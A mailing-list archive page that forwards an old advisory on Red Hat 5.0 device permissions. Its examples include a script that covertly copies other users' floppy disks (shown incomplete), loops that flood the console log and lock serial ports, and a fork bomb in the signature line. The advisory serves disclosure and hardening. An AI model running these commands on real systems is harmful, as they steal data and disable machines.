[LUGA] Mit freundlicher Unterstützung von:
Linux New Media AG

Mail Thread Index

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[luga] RH 5.0 Security Bugs

Die > 5 M$ Security Bugs (ftpd) schick ich nicht, da das eine Linux 
Mailling List ist (furchtbar, man glaubt in Redmont ist die Zeit 
stehengeblieben ..)


- ----------

Any user can read data from (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
may write a script, which periodically checks if floppy has been
just unmounted, then dumps it's content to a file. Here's a sample
'floppy collector':

- -- fdumper --
while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" =3D "" ]; then
    if [ "$DUMPED" =3D "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=3DLABEL+1
- -- eof --

Also, if there's no floppy in drive, unprivledged user may flood
kernel log console (local console by default!!!):

[user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to console (default klogd behaviour). Also,
every printk(...) (called by fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.

Second one
- -----------
(not tested with rh 5.0)

Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
disallows multiple access attempts at the same time, so user may
permanently lock choosen port using this command:

[user@host user]$ cat /dev/ttyS0
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now serial port is in unusable state.

That's all?
- ------------

There are also a lot of other, not-so-common devices, eg. /dev/sequencer,=

which are world-readable or even world-writable.

There's no ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain an interesting
data or cause system failure by reading/writing these devices.

- ------------

ls -l /dev/* | grep "r-- "
chmod ;)

Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]=

Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 [P. =
=3D------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=3D=

------- End of Forwarded Message

powered by LINUX the choice of a gnu generation
linux user group austria;
Letzte Änderung:
September 2010